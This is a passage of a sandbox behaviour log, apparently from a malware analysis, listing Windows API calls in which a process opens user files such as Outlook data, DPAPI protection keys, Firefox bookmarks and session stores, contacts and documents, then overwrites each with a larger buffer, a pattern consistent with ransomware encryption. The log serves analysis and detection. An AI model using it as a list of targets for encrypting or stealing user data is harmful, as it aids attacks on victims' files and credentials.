(hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.867] ReleaseMutex (hMutex=0x168) returned 1 [0177.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="addressbook.acrodata", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0177.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="addressbook.acrodata", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="addressbook.acrodata", lpUsedDefaultChar=0x0) returned 20 [0177.867] ReadFile (in: hFile=0x208, lpBuffer=0x2840938, nNumberOfBytesToRead=0x1517, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x331f2bc*=0x1517, lpOverlapped=0x0) returned 1 [0177.868] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0177.869] WriteFile (in: hFile=0x208, lpBuffer=0x2849ff8*, nNumberOfBytesToWrite=0x1a9f, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2849ff8*, lpNumberOfBytesWritten=0x331f2d0*=0x1a9f, lpOverlapped=0x0) returned 1 [0177.869] CloseHandle (hObject=0x208) returned 1 [0177.869] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ECS2Y.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ecs2y.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0177.870] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.870] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x16c5a [0177.870] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.870] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.870] ReleaseMutex (hMutex=0x168) returned 1 [0177.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ECS2Y.swf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ECS2Y.swf", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ECS2Y.swf", lpUsedDefaultChar=0x0) returned 9 [0177.870] ReadFile (in: hFile=0x208, lpBuffer=0x2840938, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.871] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x15c5a [0177.872] ReadFile (in: hFile=0x208, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.872] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x15c5a [0177.872] WriteFile (in: hFile=0x208, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.873] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0177.873] WriteFile (in: hFile=0x208, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.873] CloseHandle (hObject=0x208) returned 1 [0177.873] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0177.874] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.874] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa00 [0177.874] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.874] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.874] ReleaseMutex (hMutex=0x168) returned 1 [0177.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Outlook.srs", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Outlook.srs", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Outlook.srs", lpUsedDefaultChar=0x0) returned 11 [0177.875] ReadFile (in: hFile=0x208, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x331f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0177.876] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0177.876] WriteFile (in: hFile=0x208, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x331f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0177.877] CloseHandle (hObject=0x208) returned 1 [0177.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\915f9e3b-485d-4f89-a291-82a5ad3b0ee7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\915f9e3b-485d-4f89-a291-82a5ad3b0ee7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0177.878] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.878] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1d4 [0177.878] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.878] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.878] ReleaseMutex (hMutex=0x168) returned 1 [0177.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="915f9e3b-485d-4f89-a291-82a5ad3b0ee7", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0177.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="915f9e3b-485d-4f89-a291-82a5ad3b0ee7", cchWideChar=36, lpMultiByteStr=0x1fa53fc, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="915f9e3b-485d-4f89-a291-82a5ad3b0ee7", lpUsedDefaultChar=0x0) returned 36 [0177.879] ReadFile (in: hFile=0x208, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1d4, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x331f2bc*=0x1d4, lpOverlapped=0x0) returned 1 [0177.880] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0177.880] WriteFile (in: hFile=0x208, lpBuffer=0x2848ae8*, nNumberOfBytesToWrite=0x75c, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848ae8*, lpNumberOfBytesWritten=0x331f2d0*=0x75c, lpOverlapped=0x0) returned 1 [0177.880] CloseHandle (hObject=0x208) returned 1 [0177.881] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0177.882] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.882] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xbdb [0177.882] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.882] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.882] ReleaseMutex (hMutex=0x168) returned 1 [0177.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bookmarks-2017-06-16_5.json", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0177.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bookmarks-2017-06-16_5.json", cchWideChar=27, lpMultiByteStr=0x1f8fc3c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bookmarks-2017-06-16_5.json", lpUsedDefaultChar=0x0) returned 27 [0177.882] ReadFile (in: hFile=0x208, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0xbdb, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x331f2bc*=0xbdb, lpOverlapped=0x0) returned 1 [0177.884] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0177.884] WriteFile (in: hFile=0x208, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1163, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f2d0*=0x1163, lpOverlapped=0x0) returned 1 [0177.884] CloseHandle (hObject=0x208) returned 1 [0177.885] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0177.886] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.886] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xbc5 [0177.886] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.886] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.886] ReleaseMutex (hMutex=0x168) returned 1 [0177.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sessionstore.js", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0177.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sessionstore.js", cchWideChar=15, lpMultiByteStr=0x1f7356c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sessionstore.js", lpUsedDefaultChar=0x0) returned 15 [0177.886] ReadFile (in: hFile=0x208, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0xbc5, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x331f2bc*=0xbc5, lpOverlapped=0x0) returned 1 [0177.888] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0177.888] WriteFile (in: hFile=0x208, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x114d, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f2d0*=0x114d, lpOverlapped=0x0) returned 1 [0177.888] CloseHandle (hObject=0x208) returned 1 [0177.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\vBPLPnTu8ks4bh7.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\vbplpntu8ks4bh7.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0177.889] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.889] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xec85 [0177.889] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.889] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.889] ReleaseMutex (hMutex=0x168) returned 1 [0177.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vBPLPnTu8ks4bh7.mp3", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0177.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vBPLPnTu8ks4bh7.mp3", cchWideChar=19, lpMultiByteStr=0x1f8867c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vBPLPnTu8ks4bh7.mp3", lpUsedDefaultChar=0x0) returned 19 [0177.889] ReadFile (in: hFile=0x208, lpBuffer=0x2840938, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.890] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xdc85 [0177.891] ReadFile (in: hFile=0x208, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.891] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xdc85 [0177.891] WriteFile (in: hFile=0x208, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.891] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0177.891] WriteFile (in: hFile=0x208, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.892] CloseHandle (hObject=0x208) returned 1 [0177.892] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0177.892] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.892] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x499 [0177.892] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0177.893] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.893] ReleaseMutex (hMutex=0x168) returned 1 [0177.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chucu jadnvk.contact", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0177.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chucu jadnvk.contact", cchWideChar=20, lpMultiByteStr=0x1f8867c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chucu jadnvk.contact", lpUsedDefaultChar=0x0) returned 20 [0177.893] ReadFile (in: hFile=0x208, lpBuffer=0x2840958, nNumberOfBytesToRead=0x499, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesRead=0x331f2bc*=0x499, lpOverlapped=0x0) returned 1 [0178.739] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0178.739] WriteFile (in: hFile=0x208, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa21, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x331f2d0*=0xa21, lpOverlapped=0x0) returned 1 [0178.739] CloseHandle (hObject=0x208) returned 1 [0178.741] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fFlKikTvA.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fflkiktva.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0178.774] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0178.774] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3f7f [0178.774] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0178.774] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.774] ReleaseMutex (hMutex=0x168) returned 1 [0178.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fFlKikTvA.odp", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0178.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fFlKikTvA.odp", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fFlKikTvA.odp", lpUsedDefaultChar=0x0) returned 13 [0178.774] ReadFile (in: hFile=0x208, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.775] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2f7f [0178.775] ReadFile (in: hFile=0x208, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.775] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2f7f [0178.775] WriteFile (in: hFile=0x208, lpBuffer=0x25ad708*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad708*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0178.776] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0178.776] WriteFile (in: hFile=0x208, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0178.776] CloseHandle (hObject=0x208) returned 1 [0178.777] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0179.762] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0179.762] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xd8 [0179.762] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0179.762] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.762] ReleaseMutex (hMutex=0x168) returned 1 [0179.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0179.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0179.763] ReadFile (in: hFile=0x1dc, lpBuffer=0x26c49b8, nNumberOfBytesToRead=0xd8, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c49b8*, lpNumberOfBytesRead=0x331f2bc*=0xd8, lpOverlapped=0x0) returned 1 [0179.764] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0179.764] WriteFile (in: 